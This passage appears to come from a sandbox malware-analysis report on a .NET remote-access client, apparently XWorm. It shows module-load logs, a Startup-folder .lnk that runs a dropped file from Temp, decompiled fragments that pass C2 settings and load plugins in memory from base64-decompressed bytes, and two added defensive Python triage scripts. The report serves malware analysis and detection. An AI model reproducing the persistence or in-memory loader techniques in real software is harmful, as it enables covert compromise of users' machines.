Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                    Source: System.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\System
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: 2QaN4hOyJs.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: 2QaN4hOyJs.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
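The System.lnk entry above records a Startup-folder shortcut whose RelativePath climbs six directories out of the Roaming profile and lands in the dropped file under %LocalAppData%\Temp\System. The script below is an added hunting example, not part of the Joe Sandbox report: it reads only the ShellLinkHeader and the StringData block of a .lnk (MS-SHLLINK), resolves the relative path against the Startup directory and flags any target that resolves into a Temp directory. The sample shortcut bytes are constructed inside the script so it runs offline; the Startup path is the one from the report.

```python
"""Startup-folder .lnk triage for the System.lnk persistence seen in the report.

Added example, not the report's or the malware's code. Only the header and
StringData of the Shell Link format are parsed; that is enough to recover the
RelativePath/WorkingDir strings the sandbox printed.
"""
import ntpath
import struct

LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")  # {00021401-...-46}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk as a dict of str."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the PIDL block
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip volume/local path info
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters
        pos += 2
        raw = data[pos:pos + (count * 2 if unicode else count)]
        pos += len(raw)
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def resolve_target(fields: dict, lnk_dir: str) -> str:
    """Resolve RelativePath against the directory that holds the .lnk."""
    return ntpath.normpath(ntpath.join(lnk_dir, fields.get("relative_path", "")))


def is_suspicious_startup_link(fields: dict, lnk_dir: str) -> bool:
    """A Startup shortcut that runs something out of a Temp directory is a red flag."""
    parts = resolve_target(fields, lnk_dir).lower().split("\\")
    return "temp" in parts or "tmp" in parts


def triage(lnk_bytes: bytes, lnk_dir: str) -> dict:
    fields = parse_lnk(lnk_bytes)
    return {
        "target": resolve_target(fields, lnk_dir),
        "suspicious": is_suspicious_startup_link(fields, lnk_dir),
    }


def build_lnk(relative_path: str, working_dir: str) -> bytes:
    """Construct a minimal unicode .lnk (test data, not a real dropped file)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags)
    header += b"\x00" * (0x4C - len(header))    # attributes, times, size, hotkey: zero
    body = b""
    for s in (relative_path, working_dir):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# Constructed sample mirroring the RelativePath the report shows for System.lnk.
SAMPLE_LNK = build_lnk(r"..\..\..\..\..\..\Local\Temp\System",
                       r"C:\Users\user\AppData\Local\Temp")

if __name__ == "__main__":
    print(triage(SAMPLE_LNK, STARTUP_DIR))
```

On a live host, point `triage` at each .lnk in the per-user and all-users Startup folders; a real shortcut may also carry a LinkTargetIDList and LinkInfo block, which the parser skips, so the relative path is still recovered.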

                                    Data Obfuscation

                                    Source: 2QaN4hOyJs.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 2QaN4hOyJs.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 2QaN4hOyJs.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: System.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: System.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: System.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 2QaN4hOyJs.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: 2QaN4hOyJs.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: 2QaN4hOyJs.exe, Messages.cs .Net Code: Memory
                                    Source: System.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: System.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: System.0.dr, Messages.cs .Net Code: Memory
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, Messages.cs .Net Code: Memory
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF887C1D2A5 pushad ; iretd 2_2_00007FF887C1D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF887D310A8 push E85B220Dh; ret 2_2_00007FF887D310F9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF887E02316 push 8B485F92h; iretd 2_2_00007FF887E0231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887C0D2A5 pushad ; iretd 5_2_00007FF887C0D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887D219D3 pushad ; ret 5_2_00007FF887D219E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887DF2468 push ebx; ret 5_2_00007FF887DF2472
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887DF2316 push 8B485F93h; iretd 5_2_00007FF887DF231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF887BED2A5 pushad ; iretd 10_2_00007FF887BED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF887DD2316 push 8B485F95h; iretd 10_2_00007FF887DD231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF887C1D2A5 pushad ; iretd 12_2_00007FF887C1D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF887E059C8 push eax; iretd 12_2_00007FF887E059C9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF887E02316 push 8B485F92h; iretd 12_2_00007FF887E0231B
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe File created: C:\Users\user\AppData\Local\Temp\System
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk
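The LateCall and AppDomain.Load(byte[]) entries above describe the plugin loader: the client splits an inbound message into Pack[], base64-decodes Pack[3], runs Helper.Decompress on it and hands the bytes straight to AppDomain.Load, so a plugin never touches disk. The script below is an added triage example, not the malware's code or the report's: it reproduces that decode step and then checks that the recovered blob is a managed PE by looking for the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR entry that the static analysis also lists for the sample. The delimiter value, the choice of GZip for Decompress and the header-only sample PE are assumptions constructed for the example; the real SPL and KEY values live in the extracted configuration, and this script operates on message text after any transport-layer decryption.

```python
"""Decode an XWorm-style Pack message and vet the embedded assembly.

Added example, not code from the report or from the malware. The report shows
Pack[3] going through Convert.FromBase64String, Helper.Decompress and then
AppDomain.Load(byte[]); GZip is assumed for Decompress and SPL is a made-up
delimiter, since neither value is stated in the signature text.
"""
import base64
import gzip
import hashlib
import struct

SPL = "<Xwormmm>"            # hypothetical field separator (real one is in the config)
COM_DESCRIPTOR_INDEX = 14    # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def decode_pack(message: str) -> dict:
    """Split a Pack message and recover the payload the same way the client does."""
    pack = message.split(SPL)
    if len(pack) < 4:
        raise ValueError("message has fewer than four fields")
    payload = gzip.decompress(base64.b64decode(pack[3]))
    return {
        "command": pack[0],
        "name": pack[2],                         # Pack[2] is passed to the plugin
        "payload": payload,
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


def has_com_descriptor(image: bytes) -> bool:
    """True if the PE carries a CLI header, i.e. it is something AppDomain.Load can take."""
    if image[:2] != b"MZ" or len(image) < 0x40:
        return False
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    opt = e_lfanew + 4 + 20                      # optional header follows the COFF header
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic == 0x10B:                           # PE32
        count_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                         # PE32+
        count_off, dirs_off = opt + 108, opt + 112
    else:
        return False
    (count,) = struct.unpack_from("<I", image, count_off)   # NumberOfRvaAndSizes
    if count <= COM_DESCRIPTOR_INDEX:
        return False
    rva, size = struct.unpack_from("<II", image, dirs_off + 8 * COM_DESCRIPTOR_INDEX)
    return rva != 0 and size != 0


def build_fake_pe(managed: bool) -> bytes:
    """Construct a header-only PE32 image (test data, not a loadable assembly)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)              # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)  # i386, opt hdr 224 bytes
    opt = struct.pack("<H", 0x10B) + b"\0" * 90                     # magic .. SizeOfHeapCommit
    opt += struct.pack("<I", 16)                                    # NumberOfRvaAndSizes
    dirs = [(0, 0)] * 16
    if managed:
        dirs[COM_DESCRIPTOR_INDEX] = (0x2008, 0x48)                 # CLI header RVA / size
    opt += b"".join(struct.pack("<II", r, s) for r, s in dirs)
    return dos + b"PE\0\0" + coff + opt


def build_pack(name: str, image: bytes) -> str:
    """Construct a Pack message as a server would (assumed layout: cmd, _, name, blob)."""
    blob = base64.b64encode(gzip.compress(image)).decode()
    return SPL.join(["Plugin", "", name, blob])


if __name__ == "__main__":
    msg = build_pack("SamplePlugin", build_fake_pe(managed=True))
    out = decode_pack(msg)
    print(out["command"], out["name"], out["sha256"], has_com_descriptor(out["payload"]))
```

Hashing the decompressed bytes before anything loads them gives you an indicator that survives the transport encoding, and the COM descriptor check separates a managed plugin from an unrelated blob without running it.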

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
